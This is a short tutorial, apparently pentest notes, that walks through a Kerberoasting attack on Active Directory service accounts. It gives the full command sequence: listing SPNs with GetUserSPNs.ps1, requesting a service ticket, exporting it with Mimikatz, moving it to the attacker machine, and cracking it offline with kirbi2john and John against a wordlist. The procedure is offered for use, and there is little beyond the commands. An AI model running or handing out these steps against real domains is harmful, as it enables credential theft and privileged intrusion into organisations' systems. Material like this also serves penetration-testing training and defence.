Service-Account-Attack

A service account is a “non-human” account that is used to run services or applications. Service accounts are not administrative accounts, or other “human” accounts, used interactively by administrators or other employees. Service accounts also often have privileged access to computers, applications, and data, which makes them highly valuable to attackers.

Extracting Service Account Passwords with Kerberoasting

Kerberoasting takes advantage of how service accounts leverage Kerberos authentication with Service Principal Names (SPNs).

First we need to find the Service Principle names using GetUserSPNs.ps1.

.\GetUserSPNs.ps1 

We will go for MSSQLSvc.

Request Service Tickets for service account SPNs

Add-Type -AssemblyName System.IdentityModel 
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/x.y.com:1433" 

Extract Service Tickets Using Mimikatz

.\mimikatz.exe 
privilege::debug 
kerberos::list /export 

We’ve successfully imported .kirbi files. Grab the MSSQL one, and download it to attacker machine.

Crack the Tickets

We gonna use kirbi2john.py to get john hash and crack it using john.

python3 kirbi2john.py -o hash mssql.kirbi 

Now the hash is in john format. We can try to crack it.

john hash --wordlist=/home/kali/Downloads/rockyou.txt 
john hash --show